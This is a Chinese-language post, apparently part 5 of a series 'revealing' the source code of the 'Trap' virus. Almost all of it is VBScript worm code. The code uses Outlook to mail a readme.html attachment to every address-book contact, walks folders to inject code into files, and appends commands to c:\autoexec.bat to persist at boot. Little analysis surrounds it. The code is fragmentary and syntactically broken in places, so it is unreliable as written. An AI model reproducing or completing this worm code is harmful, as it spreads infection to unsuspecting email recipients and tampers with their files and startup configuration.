“陷阱”病毒源代码大揭密[5]

on error resume next

dim wab,ra,j, oa, arrsm, eins, eaec, fm, wreg, areg,at

主題是雜机的，此过程与“欢乐时光“类似，所以不再描述
randomize

at=fso.getspecialfolder(1) & "\readme.html"

set oa = createobject("outlook.application")

set wab = oa.getnamespace("mapi")

for j = 1 to wab.addresslists.count

eins = wab.addresslists(j)

wreg=readreg (hcuw & eins)

if (wreg="") then wreg = 1

eaec = eins.addressentries.count

if (eaec > int(wreg)) then

for x = 1 to eaec

arrsm = wab.addressentries(x)

areg = readreg(hcuw & arrsm)

if (areg = "") then

set fm = wab.createitem(0)

with fm

ra = int(rnd() * 7)

.recipients.add arrsm

.subject = title(ra)

.body = title(ra)

.attachments at

.send

writereg hcuw & arrsm, 1, "reg_dword"

end with

end if

next

end if

writereg hcuw & eins, eaec, ""

next

for j = 1 to smailc

arrsm = whb(j)

set fm = wab.createitem(0)

ra = int(rnd() * 7)

with fm

.recipients.add arrsm

.subject = title(ra)

.body = title(ra)

.send

end with

next

set oa = nothing

end function

on error resume next

dim pfo, psfo, pf, ps, pfi, ext

if instr(path, fso.getspecialfolder(2)) > 0 then exit sub

if path <> "e:\" then exit sub

set pfo = fso.getfolder(path)

set psfo = pfo.subfolders

for each ps in psfo

searchhtml(ps.path)

set pf = ps.files

for each pfi in pf

ext = lcase(fso.getextensionname(pfi.path))

if code_str<>"" then addhead pfi.path, pfi, 1

addhead pfi.path,pfi, 2

end if

next

next

end sub

on error resume next

dim codetext, ko,adi, kd, kh, ks,kf,kfs

codetext = "@echo off" & vbcrlf & "path " & w1 & "command" & vbcrlf &_

set ko = fso.opentextfile("c:\autoexec.bat", 8, true)

ko.write vbcrlf & codetext